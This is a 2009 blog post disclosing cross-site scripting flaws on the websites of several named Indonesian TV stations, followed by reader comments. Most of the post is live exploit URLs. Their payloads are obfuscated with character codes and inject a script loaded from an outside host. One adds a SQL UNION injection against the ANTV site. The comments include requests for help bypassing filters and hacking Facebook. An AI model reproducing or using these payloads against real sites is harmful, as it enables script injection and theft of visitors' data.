Here, we’re gonna show you XSS (Cross Site Scripting) and XFS (XSS From SQLi) bugs on some Indo TV Stations Websites.
As you might already know that Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. As of 2007, cross-site scripting carried out on websites were roughly 80% of all documented security vulnerabilities. Often during an attack everything looks fine to the end-user who may be subject to unauthorized access, theft of sensitive data, and financial loss (Taken from wikipedia).
Here are some examples of their vulnerable URL :
= TransTV =
http://transtv.co.id/200706/sinopsispers.asp (Patched)
http://transtv.co.id/200706/programs.asp?aboutus=%22%3E%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode(60,115, 99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122, 121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34, 62,60,47,115,99,114,105,112,116,62))%3C/script%3E
= SCTV =
http://sctv.co.id/search.php?s=%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode(60,115,99,114,105, 112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97, 118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47, 115,99,114,105,112,116,62))%3C/script%3E
= Indosiar =
http://indosiar.com/search?doSearch=true&qword=%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode (60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114, 97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104, 112,34,62,60,47,115,99,114,105,112,116,62))%3C/script%3E
= GlobalTV =
http://globaltv.co.id/v2/index.php?r=c2VhcmNoLnBocA%3D%3D&kw= %3Cscript%3Edocument.write%28String.fromCharCode%2860,115,99,114, 105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100, 97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47, 115,99,114,105,112,116,62%29%29%3C/script%3E
= TVRI =
http://tvri.co.id/detail_galeri.php?id=24%27%3Cscript id=CrazydaVinci%3Edocument.write%28String.fromCharCode %2860,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99, 114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112, 104,112,34,62,60,47,115,99,114,105,112,116,62%29%29%3C/script%3E
= ANTV =
This is the worst among them, their site are vulnerable to XSS and SQL injection. But, as the topic in this post is only about XSS, we will only show you the XFS (XSS From SQLi) on their site :
http://an.tv/s/?sid=null+union+select+char%2860,115,99,114,105,112,116,32,115, 114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99, 105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105, 112,116,62%29,0–-
Let’s make indonesian sites better. 
Leave a Reply
Loading ...
Media-Box
August 30th, 2009 at 3:14 AM
moga2 webmaster site yg bersangkutan tau
September 1st, 2009 at 4:07 AM
keren2…seep dah
petramax^^
September 3rd, 2009 at 3:10 PM
Om joy emang mantabzz dah,,,
hahahaha
September 8th, 2009 at 3:18 PM
Weits, UNBELIEVABLE i ♥ Mr.Joy
September 10th, 2009 at 11:11 PM
Mr.Joy i want to know the latest XSS on FS comment, huhu Thank Alot, can you pass (menenbus) it? he
offttopic? FS nya suspend knp bang?huhu
September 10th, 2009 at 11:54 PM
om cemana sih buat wibset kayak gini……..
bagus banget…….
September 12th, 2009 at 3:43 PM
@rio
my profile was suspended because of the no_one widget v2, i’m more into fb now 
comment linker? sorry to say that for our safety, even it’s available or not, no more comment linker on public. ah yes
@heri
ini basenya wordpress bro heri, tinggal ditweak aja..
November 25th, 2009 at 7:40 AM
mantab bro..
minta ajarin yang FB dunk. ahhahaa.
uda ada email ak tuh. heheh.